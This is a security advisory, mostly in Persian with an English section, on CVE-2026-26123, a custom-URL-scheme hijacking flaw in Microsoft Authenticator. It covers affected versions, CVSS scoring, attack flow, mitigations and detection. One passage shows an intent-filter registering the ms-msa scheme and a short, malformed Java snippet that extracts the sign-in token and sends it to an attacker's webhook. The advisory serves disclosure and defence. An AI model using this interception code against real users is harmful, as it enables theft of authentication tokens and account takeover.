- شناسه CVE-2026-26123 :CVE
- CWE-939 :CWE
- yes :Advisory
- منتشر شده: مارس 10, 2026
- به روز شده: ژوئن 19, 2026
- امتیاز: 5.5
- نوع حمله: Custom URL Scheme Hijacking
- اثر گذاری: Information Disclosure
- حوزه: تلفن همراه
- برند: Microsoft
- محصول: Microsoft Authenticator for Android & IOS
- وضعیتPublished :CVE
- Yes :POC
- وضعیت آسیب پذیری: patch شده
چکیده
آسیبپذیری CVE-2026-26123 در برنامه Microsoft Authenticator ناشی از ضعف در مدیریت لینک عمیق (Deep Link) و طرح آدرس سفارشی (Custom URL Scheme) است. این ضعف امنیتی در شرایط خاص میتواند به یک برنامه مخرب روی دستگاه اجازه دهد اطلاعات حساس احراز هویت، از جمله کد ورود یکبارمصرف یا لینک احراز هویت را دریافت کند و محرمانگی حسابهای کاربران را تحت تأثیر قرار دهد.
توضیحات
آسیبپذیری CVE-2026-26123 در برنامه Microsoft Authenticator ناشی از مجوزدهی نادرست در مدیریتکننده طرح آدرس سفارشی (Improper Authorization in Handler for Custom URL Scheme) مطابق با CWE-939 است. این ضعف زمانی رخ میدهد که یک برنامه هنگام استفاده از طرحهای آدرس سفارشی، کنترلهای لازم برای اطمینان از اینکه لینکها و درخواستها فقط توسط برنامه مجاز پردازش میشوند را اعمال نکند. در چنین شرایطی، سیستمعامل ممکن است یک برنامه غیرمجاز را بهعنوان مدیریتکننده (Handler) یک لینک انتخاب کند و دادههایی که باید تنها در اختیار برنامه اصلی قرار گیرند، در اختیار برنامه دیگری قرار بگیرند.
این آسیبپذیری به نحوه مدیریت لینکهای عمیق (Deep Link) با طرح اختصاصی ms-msa:// مربوط میشود. لینکهای عمیق امکان هدایت مستقیم کاربر به قابلیتهای مشخص یک برنامه را فراهم میکنند. در Microsoft Authenticator، لینکهای دارای طرح ms-msa:// برای انتقال اطلاعات موردنیاز در فرآیند راهاندازی حساب و تکمیل مراحل احراز هویت چندعاملی (MFA) مورد استفاده قرار میگیرند. در حالت صحیح، این لینکها باید تنها توسط Microsoft Authenticator مدیریت شوند؛ اما در نسخههای آسیبپذیر، برنامه بهدرستی مالکیت این طرح آدرس سفارشی را ثبت نمیکند. در نتیجه، یک برنامه دیگر روی دستگاه میتواند همان طرح آدرس را ثبت کرده و هنگام فراخوانی لینک، بهعنوان مقصد انتخاب شود.
طبق تحلیل منتشرشده، زمانی که Microsoft Authenticator لینکهای عمیق مربوط به ورود را بهدرستی مدیریت نمیکند، یک برنامه مخرب نصبشده روی دستگاه میتواند در مسیر انتقال اطلاعات احراز هویت قرار گیرد. سناریوی حمله زمانی رخ میدهد که کاربر در حال راهاندازی Microsoft Authenticator یا تکمیل فرآیند ورود باشد. در این فرآیند، سرویس مایکروسافت یک کد QR حاوی لینک عمیق اختصاصی ایجاد میکند. اگر کاربر این کد را اسکن کند یا روی لینک ورود ضربه بزند و سیستمعامل آن را به برنامه مخرب اختصاص دهد، اطلاعات احراز هویت به جای Microsoft Authenticator به برنامه مهاجم ارسال خواهد شد.
اطلاعاتی که ممکن است در این شرایط افشا شوند شامل کد ورود یکبارمصرف و لینک احراز هویت هستند. این اطلاعات بخشی از فرآیند ورود کاربران محسوب میشوند و افشای آنها میتواند محرمانگی حسابها را تحت تأثیر قرار دهد. بر اساس تحلیل منتشرشده، در برخی سناریوها مهاجم میتواند از این اطلاعات برای در اختیار گرفتن حساب کاربری (Account Takeover) استفاده کند؛ زیرا دادههای احراز هویت افشاشده ممکن است امکان ادامه فرآیند ورود را فراهم کنند. با این حال، مایکروسافت در ارزیابی رسمی خود، اثرگذاری این آسیبپذیری را افشای اطلاعات (Information Disclosure) اعلام کرده است و Account Takeover بهعنوان پیامد احتمالی سوءاستفاده از اطلاعات افشاشده مطرح میشود.
بر اساس بردار CVSS 3.1، این آسیبپذیری دارای بردار حمله لوکال است؛ زیرا مهاجم باید ابتدا یک برنامه مخرب را روی دستگاه قربانی نصب کند. مهاجم برای سوءاستفاده از این آسیبپذیری، نیازی به داشتن سطح دسترسی قبلی روی دستگاه ندارد، اما حمله وابسته به تعامل کاربر است. در این سناریو، کاربر باید هنگام اسکن کد QR، باز کردن لینک ورود یا انتخاب برنامه پیشنهادی سیستمعامل، بهصورت ناخواسته برنامه مخرب را بهعنوان مدیریتکننده لینک تعیین کند.
بر اساس ارزیابی مایکروسافت، این آسیبپذیری تأثیر بالایی بر محرمانگی اطلاعات (Confidentiality) دارد، زیرا اطلاعات حساس احراز هویت ممکن است در اختیار یک برنامه غیرمجاز قرار گیرد. در مقابل، این ضعف تأثیری بر یکپارچگی (Integrity) و دسترسپذیری (Availability) ندارد، زیرا مهاجم امکان تغییر دادهها یا ایجاد اختلال در عملکرد Microsoft Authenticator را ندارد.
مایکروسافت این آسیبپذیری را با انتشار پچ امنیتی در نسخه 6.2511.7533 برای Android و نسخه 6.8.40 برای iOS برطرف کرده است. این پچ با اصلاح نحوه مدیریت لینکهای عمیق و طرحهای آدرس سفارشی، از انتقال اطلاعات احراز هویت به برنامههای غیرمجاز جلوگیری میکند.
CVSS
| Score | Severity | Version | Vector String |
| 5.5 | MEDIUM | 3.1 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C |

لیست محصولات آسیب پذیر
| Versions | Product |
| affected from 6.0.0 before 6.2511.7533 | Microsoft Authenticator for Android |
| affected from 6.0.0 before 6.8.40 | Microsoft Authenticator for IOS |
لیست محصولات بروز شده
| Versions | Product |
| 6.2511.7533 | Microsoft Authenticator for Android |
| 6.8.40 | Microsoft Authenticator for IOS |
استفاده محصول در ایران
در این جدول، تعداد صفحات ایندکسشده در گوگل با دامنه .ir که Microsoft Authenticator را ذکر کرده اند، ثبت شده است. این داده صرفاً برای برآورد تقریبی حضور محصولات در وب ایران استفاده شده و نمایانگر میزان نصب دقیق و استفاده واقعی نیست.
| Approx. Usage in .ir Domain via Google (Total Pages) | Search Query (Dork) | Product |
| 1,580 | site:.ir “Microsoft Authenticator” | Microsoft Authenticator |
نتیجه گیری
این آسیبپذیری نشان میدهد که مدیریت نادرست لینکهای عمیق و طرحهای آدرس سفارشی در برنامههای احراز هویت میتواند باعث افشای اطلاعات حساس ورود شود. با توجه به نقش مهم Microsoft Authenticator در فرآیندهای احراز هویت چندعاملی، نصب پچ امنیتی و رعایت توصیههای امنیتی در دستگاههای کاربران برای کاهش احتمال سوءاستفاده از این ضعف ضروری است. بر همین اساس، اقدامات زیر برای کاهش ریسک پیشنهاد میشود:
- بهروزرسانی Microsoft Authenticator: کاربران باید Microsoft Authenticator را به نسخههای 2511.7533 برای Android و 6.8.40 برای iOS یا نسخههای جدیدتر بهروزرسانی کنند تا پچ امنیتی مربوط به این آسیبپذیری اعمال شود. نصب این بهروزرسانی، تنها راهکار قطعی برای رفع ضعف موجود در مدیریت لینکهای عمیق و طرحهای آدرس سفارشی است و باید در اولویت قرار گیرد.
- نصب برنامهها فقط از منابع معتبر:کاربران باید از نصب برنامهها از منابع ناشناس یا فروشگاههای غیررسمی خودداری کنند، زیرا مهاجم برای سوءاستفاده از این آسیبپذیری نیازمند نصب یک برنامه مخرب روی دستگاه قربانی است.
- بررسی دقیق برنامههای درخواستکننده مدیریت لینکها:کاربران باید هنگام باز کردن لینکهای ورود یا اسکن کد QR، دقت کنند که لینکها توسط Microsoft Authenticator باز شوند و از انتخاب برنامههای ناشناس بهعنوان مدیریتکننده لینک خودداری کنند.
- استفاده از مدیریت متمرکز دستگاههای سازمانی: سازمانها باید با استفاده از راهکارهای مدیریت دستگاه همراه (MDM)، نصب برنامهها، وضعیت بهروزرسانی و سیاستهای امنیتی دستگاههای مورد استفاده برای احراز هویت را کنترل کنند.
- اعمال اصل حداقل دسترسی (Least Privilege): سازمانها باید دسترسی کاربران و برنامههای نصبشده روی دستگاهها را محدود کنند تا در صورت نصب یک برنامه مخرب، دامنه دسترسی مهاجم کاهش یابد.
- فعالسازی قابلیتهای امنیتی سیستمعامل موبایل: کاربران و سازمانها باید قابلیتهای امنیتی داخلی Android و iOS مانند بررسی برنامههای مخرب، محافظت در برابر نصب نرمافزارهای ناشناس و هشدارهای امنیتی سیستمعامل را فعال نگه دارند.
اجرای این اقدامات به کاهش احتمال سوءاستفاده از آسیبپذیری، جلوگیری از افشای اطلاعات احراز هویت، افزایش امنیت فرآیندهای ورود چندعاملی و محدود کردن فرصت مهاجمان برای دسترسی غیرمجاز به حسابهای کاربران کمک میکند.
امکان استفاده در تاکتیکهای Mitre Attack (در زمان اجرای حمله)
Reconnaissance (TA0043)
پیش از آغاز حمله، مهاجم بررسی میکند که قربانی از Microsoft Authenticator برای احراز هویت چندمرحلهای استفاده میکند و نسخه برنامه آسیبپذیر است. همچنین مهاجم برنامه مخربی را آماده میکند که بتواند بهعنوان Handler برای Custom URL Scheme ثبت شده و درخواستهای احراز هویت را دریافت کند. این مرحله معمولاً همراه با طراحی سناریوی مهندسی اجتماعی برای نصب برنامه مخرب انجام میشود.
Initial Access (TA0001)
دسترسی اولیه از طریق متقاعد کردن قربانی به نصب یک برنامه مخرب روی دستگاه Android یا iOS ایجاد میشود. پس از نصب، این برنامه خود را بهعنوان Handler برای برخی Deep Linkها یا Custom URL Schemeها ثبت میکند. بهرهبرداری از آسیبپذیری مستلزم وجود این برنامه و تعامل کاربر هنگام انجام فرآیند ورود یا انتخاب Handler مناسب است.
Credential Access (TA0006)
در زمان انجام فرآیند احراز هویت، برنامه مخرب میتواند به دلیل ضعف موجود در نحوه مدیریت Custom URL Scheme، One-Time Passcode (OTP) یا Authentication Deep Link را دریافت کند. این اطلاعات به مهاجم اجازه میدهد فرآیند ورود کاربر را رهگیری کرده یا از اطلاعات احراز هویت برای دسترسی غیرمجاز به حسابهای کاربری استفاده کند. این مرحله مهمترین هدف بهرهبرداری از آسیبپذیری است.
Collection (TA0009)
پس از رهگیری موفق، برنامه مخرب دادههای حساس احراز هویت شامل کدهای یکبارمصرف، Deep Linkهای ورود یا سایر اطلاعات مرتبط با فرآیند احراز هویت را جمعآوری میکند. این اطلاعات میتواند در حافظه برنامه ذخیره شده یا برای استفادههای بعدی آماده شود.
Exfiltration (TA0010)
در صورت طراحی برنامه مخرب برای برقراری ارتباط با سرور مهاجم، اطلاعات جمعآوریشده میتواند از دستگاه قربانی به زیرساخت فرماندهی و کنترل مهاجم ارسال شود. پس از انتقال این دادهها، مهاجم قادر خواهد بود از اطلاعات احراز هویت برای ورود غیرمجاز به سرویسهای هدف استفاده کند. این مرحله وابسته به عملکرد برنامه مخرب است و مستقیماً توسط خود آسیبپذیری ایجاد نمیشود.
Impact (TA0040)
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به افشای اطلاعات حساس احراز هویت، دور زدن مکانیزم احراز هویت چندمرحلهای در برخی سناریوها و دسترسی غیرمجاز به حسابهای کاربری شود. در محیطهای سازمانی، این موضوع ممکن است مهاجم را قادر سازد به سرویسهای ابری، ایمیل سازمانی یا سایر سامانههایی که توسط Microsoft Authenticator محافظت میشوند دسترسی پیدا کند. با این حال، این آسیبپذیری بهتنهایی موجب اجرای کد یا افزایش سطح دسترسی روی دستگاه قربانی نمیشود.
منابع
- https://www.cve.org/CVERecord?id=CVE-2026-26123
- https://www.cvedetails.com/cve/CVE-2026-26123/
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26123
- https://vuldb.com/vuln/350045
- https://infosecwriteups.com/microsoft-authenticators-unclaimed-deep-link-a-full-account-takeover-story-cve-2026-26123-e0409a920a02?gi=bffc648a11f2
- https://nvd.nist.gov/vuln/detail/CVE-2026-26123
- https://cwe.mitre.org/data/definitions/939.html
گزارش اثبات آسیبپذیری CVE-2026-26123
اطلاعات آسیبپذیری
عنوان: افشای اطلاعات حساس از طریق Deep Link ثبت نشده در Microsoft Authenticator
شناسه: CVE-2026-26123
وضعیت مشاوره: Advisory / Patch Available
امتیاز: CVSS: 5.5 (MEDIUM)
محصول: Microsoft Authenticator
محصول / نسخههای آسیبپذیر
در نسخههای زیر:
- Microsoft Authenticator برای Android نسخههای 6.0.0 تا قبل از 6.2511.7533
- Microsoft Authenticator برای iOS نسخههای 6.0.0 تا قبل از 6.8.40
محیطهای درگیر
- کلیه سازمانهایی که برای دسترسی به سرویسهای مایکروسافت از Microsoft Authenticator به عنوان ابزار MFA استفاده میکنند
- محیطهایBYOD که در آن کاربران Authenticator را روی دستگاههای شخصی خود نصب میکنند
- سازمانهایی که سیاستهای Conditional Access مایکروسافت را بر اساس تأیید هویت از طریق Authenticator پیادهسازی کردهاند
- کلیه کاربران شخصی و سازمانی که از Microsoft Authenticator برای حسابهای مایکروسافت خود استفاده میکنند
- دستگاههای Android و iOS که نسخههای آسیبپذیر Authenticator را اجرا میکنند
کامپوننتهای آسیبپذیر
- سیستم Deep Link اپلیکیشن، مکانیزم ثبت و مدیریت URL Scheme اختصاصی ms-msa:// در Android و iOS
- intent-filter (Android)، فیلتر intent در AndroidManifest.xml که مسئول ثبت scheme های سفارشی برای اپلیکیشنهاست
- URL Type (iOS)، مکانیزم معادل در سیستمعامل iOS برای ثبت scheme های سفارشی
- جریان احراز هویت QR Code، فرایند اضافه کردن حساب در وب سایت login.live.com که QR code حاوی deep link تولید میکند
- Android Intent Resolution System، سیستم عامل Android که بر اساس intent-filter های ثبت شده تصمیم میگیرد کدام اپلیکیشن درخواست را دریافت کند
ریشه مشکل (Root Cause Analysis)
ریشه این آسیبپذیری یک نقص طراحی امنیتی در مدیریت Deep Link های اختصاصی Microsoft Authenticator است. این مشکل مطابق با CWE-939: Improper Authorization in Handler for Custom URL Scheme طبقهبندی میشود.
Microsoft Authenticator هنگام ایجاد فرایند اضافه کردن حساب از طریق وب سایت login.live.com، یک QR code تولید میکند. این QR code حاوی یک deep link با scheme اختصاصی ms-msa:// است که پارامترهای حساس احراز هویت را شامل میشود. فرمت این deep link به صورت زیر است:
ms-msa://code=X.D655_QL2.2.U.60e61ddd-1d08-127d-d783-bda9b7v&uaid=88498cfad78b4669aaec4b7a1c8&expires=3964722534
پارامتر code یک توکن احراز هویت مستقیم است که نقش کلید اصلی را ایفا میکند. با استفاده از این توکن، میتوان بدون نیاز به رمز عبور، احراز هویت دو مرحلهای (2FA)، یا هرگونه لایه امنیتی دیگری، مستقیماً وارد حساب شد.
مشکل اصلی اینجاست، Microsoft Authenticator خودش این deep link را ثبت نمیکند. یعنی اپلیکیشن Authenticator هیچ intent-filter در Android و هیچ URL Type در iOS برای دریافت scheme ms-msa:// ثبت نکرده است. وقتی کاربر QR code را با اسکنر دوربین اصلی دستگاه (نه اپلیکیشن Authenticator) اسکن میکند و گزینه “Open Link” را میزند، سیستمعامل Android (یا iOS) هیچ اپلیکیشن ثبتشدهای برای این scheme پیدا نمیکند
این وضعیت سه نتیجه متفاوت دارد:
اگر هیچ اپلیکیشن دیگری scheme را ثبت نکرده باشد، خطا رخ میدهد و اپلیکیشن Authenticator باز نمیشود
اگر یک اپلیکیشن مخرب از قبل scheme را ثبت کرده باشد، سیستمعامل آن را به عنوان handler پیشفرض انتخاب میکند (بدون نمایش پرامپت انتخاب به کاربر)
در Android 12 و بالاتر، اگر scheme تأیید نشده باشد، لینک به مرورگر پیشفرض بازمیگردد، اما scheme های سفارشی (non-HTTP/HTTPS) مشمول این قاعده نمیشوند.
علت اصلی این نقص، عدم پیادهسازی App Link Verification است. اگر Microsoft Authenticator از App Links (HTTP/HTTPS scheme با assetlinks.json برای Android و Universal Links با apple-app-site-association برای iOS) به جای custom scheme استفاده میکرد، این آسیبپذیری وجود نمیداشت. اما حتی با استفاده از custom scheme، عدم ثبت intent-filter توسط خود اپلیکیشن، مشکل اصلی بود.
نکته مهم، این آسیبپذیری نشان میدهد که استفاده از custom URI scheme ها (non-HTTP/HTTPS) برای جریان های حساس احراز هویت، ذاتاً ناامن است. Android از نسخه ۱۲ به بعد، App Links تأییدشده را به مرورگر پیشفرض هدایت میکند، اما custom scheme ها (مانند ms-msa://) از این محافظت مستثنی هستند و هر اپلیکیشنی میتواند آن ها را ثبت کند.
بخش آسیبپذیر
رفتار ناامن سیستم:
مشکل امنیتی اصلی در Microsoft Authenticator عدم پیادهسازی App Link Verification و عدم ثبت intent-filter (Android) یا URL Type (iOS) برای scheme اختصاصی ms-msa:// است. این نقص به هر اپلیکیشن مخربی که روی همان دستگاه نصب باشد اجازه میدهد deep link احراز هویت را رهگیری کند.
نحوه سوءاستفاده مهاجم:
- ثبت Deep Link ثبت نشده مهاجم در فایل AndroidManifest.xml اپلیکیشن مخرب خود، intent-filter زیر را اضافه میکند
<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />
<data android:scheme="ms-msa" />
</intent-filter>
- وقتی کاربر QR code را اسکن کند و اپلیکیشن مخرب deep link را دریافت کند، کد جاوا زیر توکن را استخراج و به سرور مهاجم ارسال میکند:
<Intent intent = getIntent;<
<Uri data = intent.getData;<
<String token = data.getQueryParameter("code");<
// ارسال توکن به سرور مهاجم
sendToWebhook(token);
- مهاجم با استفاده از توکن سرقت شده، میتواند کدهای 2FA را از Authenticator تولید کند، از طریق فرآیند Authenticator وارد شود و دسترسی کامل به حساب کاربری پیدا کند
نقش این آسیبپذیری در زنجیره حمله
این آسیب پذیری یک ابزار جمعآوری اطلاعات (Information Collection) و نقض حریم خصوصی (Privacy Violation) در زنجیره حمله محسوب میشود. با توجه به نمره CVSS 5.5 (متوسط)، ماهیت محلی، و نیاز به تعامل کاربر، مهاجم میتواند با فریب کاربر برای نصب برنامه مخرب و انتخاب آن به عنوان مدیریتکننده لینکهای احراز هویت، به کدهای MFA دسترسی پیدا کند.
پیشنیازهای بهرهبرداری (Prerequisites)
- نصب نسخه آسیبپذیر Microsoft Authenticator
- نصب یک اپلیکیشن مخرب روی همان دستگاه که scheme ms-msa:// را ثبت کرده باشد
- قربانی باید QR code را با اسکنر دوربین اصلی اسکن کند و گزینه “Open Link” را لمس کند
- عدم نصب وصله امنیتی
رفتار مورد انتظار در حالت امن (Expected Secure Behavior)
- Microsoft Authenticator باید intent-filter (Android) یا URL Type (iOS) برای scheme ms-msa:// ثبت کند تا خودش handler پیشفرض باشد
- در صورت عدم ثبت handler، سیستم عامل نباید اجازه دهد اپلیکیشن های ثالث این scheme را ثبت کنند
- استفاده از App Links (HTTP/HTTPS scheme با تأیید دامنه) به جای custom scheme برای جریان های احراز هویت حساس
- اپلیکیشن Authenticator باید قبل از پردازش deep link، اعتبارسنجی کند که درخواست واقعاً از سیستمعامل رسیده و نه از یک اپلیکیشن ثالث
- استفاده از مکانیزم های امنیتی مانند PKCE (Proof Key for Code Exchange) برای محافظت در برابر رهگیری کدهای احراز هویت
راهکارها و کاهش ریسک (Mitigation / Patch Guidance)
اقدامات فوری برای کاهش ریسک:
- به روزرسانی Microsoft Authenticator به نسخه های پچ شده
- حذف کلیه اپلیکیشن های مشکوک یا غیرضروری از دستگاه ها، بهویژه اپلیکیشن هایی که اخیراً نصب شده اند و مجوزهای غیرعادی درخواست کرده اند
- بررسی تاریخچه ورود به حساب های مایکروسافت و شناسایی دستگاه ها یا آدرس های IP ناشناخته
- بازنشانی رمز عبور حساب های مایکروسافت و باطل سازی تمامی session های فعال
اقدامات کوتاهمدت / میانمدت برای کاهش ریسک:
- اجرای سیاست های MDM/UEM برای اعمال بهروزرسانی خودکار و اجباری Microsoft Authenticator در تمام دستگاه های سازمانی
- بازبینی و تقویت سیاستهای Conditional Access در Microsoft Entra ID برای شناسایی رفتارهای غیرعادی احراز هویت
- آموزش کاربران در خصوص خطرات باز کردن لینک های ناشناس و دانلود فایل های غیرقابل اعتماد
- استقرار Mobile Threat Defense (MTD) برای شناسایی اپلیکیشن های مخرب روی دستگاه ها
- فعال سازی اعلان های ورود به حساب و Impossible Travel alerts در Azure AD / Microsoft Entra ID
- استفاده از Passkeys یا کلیدهای سخت افزاری FIDO2 به جای Authenticator برای حساب های ادمین و حساس
اقدامات بلندمدت برای کاهش ریسک:
- مهاجرت از custom URI schemeها (مانند ms-msa://) به App Links (Android) و Universal Links (iOS) با تأیید دامنه برای تمام جریانهای احراز هویت
- پیاده سازی مکانیزم های امنیتی مانند PKCE در جریان های احراز هویت مبتنی بر deep link
- پیاده سازی Mobile Device Management برای تمام دستگاه های سازمانی با قابلیت application whitelisting
- اجرای فرآیند Security Audit منظم برای بررسی intent-filter ها و URL Type های ثبت شده در اپلیکیشن های سازمانی
- پیادهسازی Mobile Application Security Testing (MAST) در فرآیند CI/CD
- تدوین و اجرای سیاست های Zero Trust برای احراز هویت موبایل، با تأکید بر device compliance و app attestation
تشخیص و مانیتورینگ (Detection & Monitoring)
نشانههای تلاش برای سوءاستفاده:
- نمایش مکرر پرامپت های انتخاب handler برای لینکهای احراز هویت (نشانهای از نصب اپلیکیشن رقیب)
- ورودهای غیرعادی به حساب های مایکروسافت از آدرس های IP یا دستگاه های ناشناخته
- فعالیت های احراز هویت غیرمنتظره در لاگ های Microsoft Entra ID (Azure AD)
- نصب اپلیکیشن های ناشناخته که مجوز Internet را درخواست میکنند
- تغییرات غیرمنتظره در تنظیمات احراز هویت حساب های مایکروسافت
- تلاشهای مکرر ناموفق ورود به حساب
منابع پیشنهادی برای مانیتورینگ و پایش:
- adb shell pm list packages برای شناسایی اپلیکیشنهای نصبشده
- adb shell dumpsys package resolution برای بررسی intent-filter های ثبت شده
- Google Play Protect برای شناسایی اپلیکیشنهای مخرب
- Device Management logs
- App Library برای بررسی اپلیکیشنهای نصب شده
- iOS Settings – VPN & Device Management
- جمعآوری و تحلیل لاگهای Microsoft Entra ID (Azure AD) برای شناسایی الگوهای ورود غیرعادی
- راهکارهایی مانند Microsoft Defender for Endpoint، CrowdStrike، یا SentinelOne برای شناسایی رفتارهای مشکوک مرتبط با احراز هویت
- بررسی لاگهای سیاستهای Conditional Access برای شناسایی ورودهایی که شرایط عادی را رعایت نمیکنند
- بررسی منظم لاگهای ورود برای شناسایی IPهای ناشناخته، دستگاههای جدید، و رفتارهای Impossible Travel
- بررسی وضعیت بهروزرسانی Authenticator در تمام دستگاههای مدیریتشده
- شناسایی ارتباطات شبکه مشکوک به سرورهای خروجی (C2) که توکنهای سرقتشده را دریافت میکنند
واکنش به حادثه (Incident Response)
- بهروزرسانی فوری Microsoft Authenticator به آخرین نسخه
- حذف برنامههای مشکوک که اخیراً نصب شدهاند
- بازنشانی رمزهای عبور حسابهایی که ممکن است در معرض خطر قرار گرفته باشند
- فعالسازی احراز هویت دو مرحلهای (MFA) با روشهای جایگزین
- بررسی فعالیتهای غیرعادی در حسابهای آنلاین (ورود از مکانهای ناشناس)
- بررسی لاگهای ورود در Microsoft Entra ID
- مستندسازی کامل حادثه (زمان وقوع، نشانهها، اقدامات انجامشده، درسآموختهها) و گزارش به مدیریت ارشد و تیم واکنش سریع (CSIRT)
جریان حمله (Attack Flow)
در نمودار زیر (شکل ۱)، مهاجم با فریب کاربر برای نصب برنامه مخرب و انتخاب آن به عنوان مدیریتکننده لینک احراز هویت، کدهای MFA را سرقت میکند.

اثبات مفهوم (PoC) — کاملاً غیرمخرب
آزمایشگاه تخصصی Vulnerbyte، این آسیبپذیری را در محیط ایزوله و کنترلشده با استفاده از نسخه آسیبپذیر بررسی و اجرا کرده است
- این آزمایشگاه شامل نسخه آسیبپذیر Microsoft Authenticatorاست
- ارسال URI هایی با Scheme های Microsoft Authenticator ثبت کرده است
- اجرای PoC در محیط آزمایشگاهی منجر به این شد که Microsoft Authenticator از سه URI ارسالی فقط یکی از آن ها را هندل کرده است
- این اثبات مفهوم صرفاً توصیفی و آموزشی بوده و شامل تغییرات مخرب نمیشود

رفع مسئولیت
این گزارش صرفاً با هدف آموزش، تحلیل فنی و ارتقای امنیت سازمانی تهیه شده است. هرگونه استفاده مخرب یا خارج از چارچوبهای قانونی از محتوای آن ممنوع است.
منابع
https://www.cve.org/CVERecord?id=CVE-2026-26123
https://nvd.nist.gov/vuln/detail/CVE-2026-26123
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-26123
https://cwe.mitre.org/data/definitions/939.html
Microsoft Authenticator
CVE-2026-26123 – Information Disclosure via Improper Authorization in Custom URL Scheme Handler
Affects
- Microsoft Authenticator (mobile authentication application)
- Platforms:
- iOS versions before 6.8.40
- Android versions before 6.2511.7533
NOT VULNERABLE:
- Microsoft Authenticator for iOS version 6.8.40 and later
- Microsoft Authenticator for Android version 6.2511.7533 and later
Description
CVE-2026-26123 is a medium-severity information disclosure vulnerability in Microsoft Authenticator, discovered by security researcher Khaled Mohamed .
Microsoft Authenticator is a mobile application used for multi-factor authentication (MFA), generating time-based one-time codes (TOTP) and handling sign-in deep links for Microsoft and third-party services .
The vulnerability exists in the custom URL scheme handler used by the application . When the app processes sign-in deep links, it fails to properly authorize which application handles the link, as defined by CWE-939: Improper Authorization in Handler for Custom URL Scheme .
If a user has a malicious app installed on their device and accidentally selects it as the handler for an authentication deep link, the malicious app receives the sign-in information intended for Microsoft Authenticator. This can include one-time sign-in codes or authentication deep links .
Key technical characteristics:
- CWE: CWE-939 – Improper Authorization in Handler for Custom URL Scheme
- Attack vector: Local (requires malicious app on the same device)
- User interaction: Required (must select malicious app as handler)
- No public exploit available
Attack Vector
Primary Attack Vector:
Local / Physical (requires malicious app installed on the victim’s device)
Attack Scenario:
- An attacker creates a malicious mobile application designed to intercept authentication URL schemes
- The victim installs the malicious app on their device (any source: official app store, third-party store, or sideloading)
- The victim scans a QR code or taps a sign-in link that should open in Microsoft Authenticator
- The device displays a prompt asking which app should handle the authentication deep link
- The victim accidentally or unknowingly selects the malicious app instead of Microsoft Authenticator
- The malicious app receives the one-time sign-in code or authentication deep link
- The attacker uses the intercepted information to authenticate as the victim
Key Characteristics:
| Attribute | Details |
|---|---|
| Attack Vector | LOCAL |
| Attack Complexity | LOW |
| Privileges Required | NONE |
| User Interaction | REQUIRED |
| Scope | UNCHANGED |
| Confidentiality Impact | HIGH |
| Integrity Impact | NONE |
| Availability Impact | NONE |
Conditions Affecting Risk:
- Users with multiple authenticator or authentication-handling apps installed
- Users who frequently scan QR codes for authentication
- BYOD environments where users install third-party apps on the same device as corporate authenticator
- Device owners who are not cautious about which app handles sign-in links
Impact
Successful exploitation allows an attacker to:
- Intercept one-time sign-in codes generated by Microsoft Authenticator
- Capture authentication deep links intended for the authenticator app
- Use the intercepted information to authenticate as the victim user
- Access services protected by the compromised account (email, files, cloud applications)
- Potentially pivot to additional accounts if protected by codes from the same Authenticator device
| Impact Area | Level | Description |
|---|---|---|
| Confidentiality | HIGH | One-time login codes and authentication deep links exposed |
| Integrity | NONE | No data modification possible |
| Availability | NONE | Service remains functional |
Important: The attacker does not bypass MFA directly; they intercept the valid MFA token or deep link that would complete the authentication flow . The vulnerability effectively undermines the trust in the sign-in process rather than breaking the cryptographic mechanisms.
Secondary Impacts:
- Account takeover of Microsoft and third-party services
- Privilege escalation within enterprise environments (BYOD scenarios)
- Data exfiltration from compromised accounts
- Potential lateral movement to additional accounts
Observed Exploitation & Threat Activity
- Discovery: Khaled Mohamed
- CVE Assignment: March 10, 2026
- Patch Availability: Released March 10, 2026
- Public PoC: No evidence of public proof-of-concept
- In-the-Wild Exploitation: Not confirmed – Microsoft reports “Exploited:No”
- CVSS Score: 5.5 (Medium)
Disclosure Timeline:
| Date | Event |
|---|---|
| March 9, 2026 | Vulnerability published in CVEs |
| March 10, 2026 | Microsoft releases security updates for iOS and Android |
| March 10, 2026 | NVD publishes CVE-2026-26123 |
| March 11, 2026 | Public disclosure and media coverage |
Exploit Prediction Scoring System (EPSS):
- EPSS Score: 0.006 (0.6%)
- Ranking: 44.4% percentile
- Exploitation status: “Exploitation Less Likely”
SSVC Assessment: Exploitation: none; Automatable: no; Technical Impact: partial
Severity & Metrics
- CVSS v3.1 (Microsoft CNA): Medium (5.5)
- Attack Vector: LOCAL
- Attack Complexity: LOW
- Privileges Required: NONE
- User Interaction: REQUIRED
- Scope: UNCHANGED
- Confidentiality Impact: HIGH
- Integrity Impact: NONE
- Availability Impact: NONE
Vector String: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Additional Scoring:
- CVSS v4.0:
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/U:Green(Medium) - Microsoft Severity: Important
Relevant CWE:
- CWE-939 – Improper Authorization in Handler for Custom URL Scheme
Patch & Vendor Status
- Official Patches Available: Yes – released March 10, 2026
- Vendor: Microsoft Corporation
Fixed Versions:
| Platform | Vulnerable Version | Fixed Version |
|---|---|---|
| iOS | Before 6.8.40 | 6.8.40 or later |
| Android | Before 6.2511.7533 | 6.2511.7533 or later |
Update Sources:
- iOS: Apple App Store – https://apps.apple.com/us/app/microsoft-authenticator/id983156458
- Android: Google Play Store – https://play.google.com/store/apps/details?id=com.azure.authenticator&hl=en_US
Microsoft Statement:
“User interaction is required because the user must have a malicious application installed on their device and then accidentally select that application as the handler for the sign-in deep link. This can occur when the user scans a QR code or taps a sign-in link and chooses the malicious app instead of Microsoft Authenticator, causing the sign-in flow to be handled by the attacker-controlled app.”
Mitigation & Remediation
Immediate Actions
| Action | Method |
|---|---|
| Update Microsoft Authenticator (iOS) | App Store → Profile → Pending Updates → Update to 6.8.40+ |
| Update Microsoft Authenticator (Android) | Google Play → Profile → Manage apps → Update to 6.2511.7533+ |
| Enable automatic app updates | iOS: Settings → App Store → App Updates → Enable; Android: Play Store → Settings → Auto-update apps |
Short-Term Defensive Measures
If updating is not immediately possible:
- Avoid installing untrusted apps that request to handle authentication links
